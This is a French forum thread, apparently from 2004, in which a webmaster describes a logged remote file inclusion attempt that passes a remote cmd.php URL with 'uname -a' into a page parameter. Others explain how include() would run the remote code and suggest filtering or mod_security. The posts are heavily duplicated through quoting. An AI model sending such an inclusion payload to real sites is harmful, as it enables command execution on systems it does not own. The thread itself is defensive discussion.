Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Enfin ça reste HS :-)
bcp de boulot et de traitement pour un truc qui peut changer tout le temps... et surtout completement inutile si on fait les verifications necessaires *avant* d'inclure n'importe quoi
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.
Enfin ça reste HS :-)
bcp de boulot et de traitement pour un truc qui peut changer tout le
temps...
et surtout completement inutile si on fait les verifications necessaires
*avant* d'inclure n'importe quoi
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Enfin ça reste HS :-)
bcp de boulot et de traitement pour un truc qui peut changer tout le temps... et surtout completement inutile si on fait les verifications necessaires *avant* d'inclure n'importe quoi
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Patrick.
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme
mod_security
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Patrick.
EspaceTrain
Bonjour Stéphane,
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Tout à fait. C'est toutefois complémentaire des tests d'inclusion d'url. Cela me permet de bannir entièrement mon site des amusements d'u indélicat.
Enfin ça reste HS :-)
Pas tout à fait :-) Quel serait l'impact chez un hébergeur d'une intrusion réussie sur un site ? -- Fred
Bonjour Stéphane,
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est
trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse
suivant l'ip de connextion, que sais je encore.
Tout à fait.
C'est toutefois complémentaire des tests d'inclusion d'url.
Cela me permet de bannir entièrement mon site des amusements d'u indélicat.
Enfin ça reste HS :-)
Pas tout à fait :-)
Quel serait l'impact chez un hébergeur d'une intrusion réussie sur un site ?
--
Fred
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Tout à fait. C'est toutefois complémentaire des tests d'inclusion d'url. Cela me permet de bannir entièrement mon site des amusements d'u indélicat.
Enfin ça reste HS :-)
Pas tout à fait :-) Quel serait l'impact chez un hébergeur d'une intrusion réussie sur un site ? -- Fred
EspaceTrain
Bonjour Thibaut,
et surtout completement inutile si on fait les verifications necessaires *avant* d'inclure n'importe quoi
L'un n'empêche pas l'autre. Perso, je bloque ainsi l'accès de tout mon site à l'indélicat qui fait mumuse avec une manip d'intrusion. C'est une sécurité supplémentaire dans le cas où je laisserais passer une faille... -- Fred
Bonjour Thibaut,
et surtout completement inutile si on fait les verifications
necessaires *avant* d'inclure n'importe quoi
L'un n'empêche pas l'autre.
Perso, je bloque ainsi l'accès de tout mon site à l'indélicat qui fait
mumuse avec une manip d'intrusion.
C'est une sécurité supplémentaire dans le cas où je laisserais passer une
faille...
--
Fred
et surtout completement inutile si on fait les verifications necessaires *avant* d'inclure n'importe quoi
L'un n'empêche pas l'autre. Perso, je bloque ainsi l'accès de tout mon site à l'indélicat qui fait mumuse avec une manip d'intrusion. C'est une sécurité supplémentaire dans le cas où je laisserais passer une faille... -- Fred
trewan
Pour info, Ovh a été hacké cette semaine (dont le site dont je m'occupe), il a laissé en signature "mirrorteam"
Trewan
VarioFlux wrote:
Cedric Blancher a couché sur son écran :
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Merci
Pour info, Ovh a été hacké cette semaine (dont le site dont je
m'occupe), il a laissé en signature "mirrorteam"
Trewan
VarioFlux wrote:
Cedric Blancher a couché sur son écran :
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je
teste par un switch certaines valeurs prédéfinies sinon j'en impose une
par défaut, ça me permet de remplir une valeur numérique et je déclenche
des includes spécifiques par un switch sur la valeur numérique (qui gère
aussi les valeurs et le "par défaut") de pages internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais
comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que
chercher ?
Pour info, Ovh a été hacké cette semaine (dont le site dont je m'occupe), il a laissé en signature "mirrorteam"
Trewan
VarioFlux wrote:
Cedric Blancher a couché sur son écran :
Elle est passée l'attaque ? C'est quoi le résultat de la requête ?
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Merci
Dominique ROUSSEAU
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Ca *pourrait* etre pour tenter de faire exécuter un bout de code "hostile" dans le contexte du site attaqué. Selon la façon dont le "pg=..." est traité ensuite, par exemple si c'est un include(), si le site distant envoie un bout de source PHP, il sera executé dans le contexte du site attaqué, donc accès à des trucs genre conf bdd, parcours des fichiers du répertoire, etc.
Dom
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Ca *pourrait* etre pour tenter de faire exécuter un bout de code
"hostile" dans le contexte du site attaqué.
Selon la façon dont le "pg=..." est traité ensuite, par exemple si c'est
un include(), si le site distant envoie un bout de source PHP, il sera
executé dans le contexte du site attaqué, donc accès à des trucs genre
conf bdd, parcours des fichiers du répertoire, etc.
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Ca *pourrait* etre pour tenter de faire exécuter un bout de code "hostile" dans le contexte du site attaqué. Selon la façon dont le "pg=..." est traité ensuite, par exemple si c'est un include(), si le site distant envoie un bout de source PHP, il sera executé dans le contexte du site attaqué, donc accès à des trucs genre conf bdd, parcours des fichiers du répertoire, etc.
Dom
Lionel
Thibaut Allender wrote:
c'est simple
il y a un détail qui m'échappe...
Un include est forcément utilisé dans une balise php:
<?php include($maVar); ?>
donc en incluant le code du site passé en paramètre, le résultat sera: <?php <? system(uname -a); ?> ?>
ce qui va donner une erreur... ???
Thibaut Allender wrote:
c'est simple
il y a un détail qui m'échappe...
Un include est forcément utilisé dans une balise php:
<?php
include($maVar);
?>
donc en incluant le code du site passé en paramètre, le résultat sera:
<?php
<?
system(uname -a);
?>
?>
Un include est forcément utilisé dans une balise php:
<?php include($maVar); ?>
donc en incluant le code du site passé en paramètre, le résultat sera: <?php <? system(uname -a); ?> ?>
ce qui va donner une erreur... ???
Stephane Kanschine
Dans , Patrick tapotait :
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la théorie, chacun ses choix techniques derrière. Pour ce faire, j'employerais apache direct, y'a une solution déjà integrée.
-- Stephane Kanschine Amadouer l'anti-spam pour me répondre
Dans <pan.2004.02.26.14.25.25.30666.12159@deepcore.org>, Patrick
tapotait :
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est
trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse
suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme
mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la
théorie, chacun ses choix techniques derrière. Pour ce faire,
j'employerais apache direct, y'a une solution déjà integrée.
--
Stephane Kanschine
Amadouer l'anti-spam pour me répondre
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la théorie, chacun ses choix techniques derrière. Pour ce faire, j'employerais apache direct, y'a une solution déjà integrée.
-- Stephane Kanschine Amadouer l'anti-spam pour me répondre
Thibaut Allender
donc en incluant le code du site passé en paramètre, le résultat sera: <?php <? system(uname -a); ?> ?>
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux a écrit :
cmd=uname%20-a
uname -a est une commande unix pour voir quel est l'OS (linux, sun, FreeBSD, ou tout autre) deta becane. Il voulait voir ça afin de voir quelles peuvent être les failles
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux a écrit :
cmd=uname%20-a
uname -a est une commande unix pour voir quel est l'OS (linux, sun,
FreeBSD, ou tout autre) deta becane. Il voulait voir ça afin de voir
quelles peuvent être les failles
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux a écrit :
cmd=uname%20-a
uname -a est une commande unix pour voir quel est l'OS (linux, sun, FreeBSD, ou tout autre) deta becane. Il voulait voir ça afin de voir quelles peuvent être les failles
